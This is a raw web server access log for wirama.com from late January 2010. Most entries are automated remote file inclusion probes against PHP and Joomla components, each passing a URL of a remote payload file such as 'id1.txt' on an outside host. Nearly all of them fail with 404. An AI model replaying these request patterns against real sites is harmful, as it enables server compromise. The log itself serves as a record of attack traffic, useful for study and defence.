84.40.23.86 - - [31/Jan/2010:21:48:20 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
84.40.23.86 - - [31/Jan/2010:21:48:20 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
84.40.23.86 - - [31/Jan/2010:21:48:20 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [31/Jan/2010:21:48:35 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [31/Jan/2010:21:48:35 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [31/Jan/2010:21:48:35 -0800] "GET /logs/access_091031.log/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [31/Jan/2010:21:48:36 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [31/Jan/2010:21:48:36 -0800] "GET /logs/access_091031.log/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [31/Jan/2010:21:48:36 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.40.23.86 - - [31/Jan/2010:21:48:40 -0800] "GET /logs/access_090801.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
84.40.23.86 - - [31/Jan/2010:21:48:53 -0800] "GET /logs/access_090801.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:21:58:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:21:58:33 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:21:58:33 -0800] "GET /logs/access_091101.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.51.70 - - [31/Jan/2010:22:02:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:11:31 -0800] "GET /logs/access_091101.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:11:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:11:31 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:11:31 -0800] "GET /logs/access_090601.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.40.203.226 - - [31/Jan/2010:22:18:59 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.40.203.226 - - [31/Jan/2010:22:18:59 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.40.203.226 - - [31/Jan/2010:22:18:59 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.40.203.226 - - [31/Jan/2010:22:20:40 -0800] "GET /logs/access_091201.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.40.203.226 - - [31/Jan/2010:22:20:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.40.203.226 - - [31/Jan/2010:22:20:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:21:37 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:21:37 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:21:37 -0800] "GET /logs/access_091101.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:21:37 -0800] "GET /logs/access_090601.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [31/Jan/2010:22:22:08 -0800] "GET /logs/access_091031.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [31/Jan/2010:22:22:08 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [31/Jan/2010:22:22:08 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [31/Jan/2010:22:24:01 -0800] "GET /logs/access_091201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:26:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:26:22 -0800] "GET /logs/access_091101.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:26:22 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:22:26:31 -0800] "GET /logs/access_090601.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.48.18.241 - - [31/Jan/2010:22:38:22 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.48.18.241 - - [31/Jan/2010:22:38:26 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.6.218.57 - - [31/Jan/2010:22:39:49 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.6.218.57 - - [31/Jan/2010:22:39:49 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.48.18.241 - - [31/Jan/2010:22:48:29 -0800] "GET /logs/access_091101.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [31/Jan/2010:22:50:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:22:50:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:22:50:36 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.6.218.57 - - [31/Jan/2010:22:50:52 -0800] "GET /logs/access_091101.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.46.199.185 - - [31/Jan/2010:22:53:21 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
189.6.218.57 - - [31/Jan/2010:22:57:28 -0800] "GET /logs/access_091201.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.6.218.57 - - [31/Jan/2010:23:10:25 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:15 -0800] "GET /logs/access_091101.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:16 -0800] "GET /logs/access_091101.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:50 -0800] "GET /logs/access_091031.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Jan/2010:23:15:50 -0800] "GET /logs/access_091031.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.244.25.227 - - [31/Jan/2010:23:17:03 -0800] "GET /logs/access_090329.log/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
87.244.25.227 - - [31/Jan/2010:23:17:03 -0800] "GET /spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
87.244.25.227 - - [31/Jan/2010:23:17:03 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
87.244.25.227 - - [31/Jan/2010:23:17:20 -0800] "GET /logs/access_090330.log/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
200.207.8.238 - - [31/Jan/2010:23:18:58 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.207.8.238 - - [31/Jan/2010:23:18:58 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.48.18.241 - - [31/Jan/2010:23:34:31 -0800] "GET /logs/access_091101.log//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.48.18.241 - - [31/Jan/2010:23:34:31 -0800] "GET /modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.48.18.241 - - [31/Jan/2010:23:34:31 -0800] "GET /logs//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:23:36:14 -0800] "GET /board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:36:52 -0800] "GET /logs/access_100101.log//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:23:36:52 -0800] "GET /logs//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:23:36:52 -0800] "GET /board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:23:37:32 -0800] "GET /logs/access_100101.log//board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:37:32 -0800] "GET /board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
210.211.149.198 - - [31/Jan/2010:23:38:10 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.co.in/search?hl=en&client=firefox-a&rls=com.ubuntu%3Aen-US%3Aofficial&hs=E4B&q=HTTP%2F1.1+200+675&btnG=Search&meta=&aq=f&oq=" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3" "www.wirama.com"
87.250.255.243 - - [31/Jan/2010:23:39:32 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:40:54 -0800] "GET /logs/access_100101.log//board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:40:54 -0800] "GET /board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:40:54 -0800] "GET /logs//board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:29 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:29 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:29 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:29 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:29 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:29 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:46 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:46 -0800] "GET /logs/access_090329.log%20%20///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:46 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:46 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:46 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [31/Jan/2010:23:46:47 -0800] "GET /logs/access_090329.log%20%20///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.6.218.57 - - [31/Jan/2010:23:46:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.6.218.57 - - [31/Jan/2010:23:46:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.6.218.57 - - [31/Jan/2010:23:46:53 -0800] "GET /logs/access_091101.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:07 -0800] "GET /board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:07 -0800] "GET /logs//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:07 -0800] "GET /logs/access_100101.log%20%20//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:18 -0800] "GET /board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:18 -0800] "GET /logs/access_100101.log%20%20//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:18 -0800] "GET /logs//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [31/Jan/2010:23:47:24 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [31/Jan/2010:23:47:24 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [31/Jan/2010:23:47:24 -0800] "GET /logs/access_090601.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:34 -0800] "GET /board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:34 -0800] "GET /logs//board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:47:34 -0800] "GET /logs/access_100101.log//board.php?code=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:52:58 -0800] "GET /logs/access_100101.log%20%20//board.php?code=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:52:58 -0800] "GET /board.php?code=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [31/Jan/2010:23:52:58 -0800] "GET /logs//board.php?code=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [31/Jan/2010:23:56:51 -0800] "GET /logs/access_100101.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.40.203.226 - - [31/Jan/2010:23:58:17 -0800] "GET /logs/access_090601.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.40.203.226 - - [31/Jan/2010:23:58:17 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.40.203.226 - - [31/Jan/2010:23:58:17 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.67.244.57 - - [31/Jan/2010:23:59:03 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.67.244.57 - - [31/Jan/2010:23:59:16 -0800] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.67.244.57 - - [31/Jan/2010:23:59:16 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.67.244.57 - - [31/Jan/2010:23:59:16 -0800] "GET /logs/access_090731.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:00:00:05 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:00:00:05 -0800] "GET /logs/access_091101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:00:00:05 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:00:00:05 -0800] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
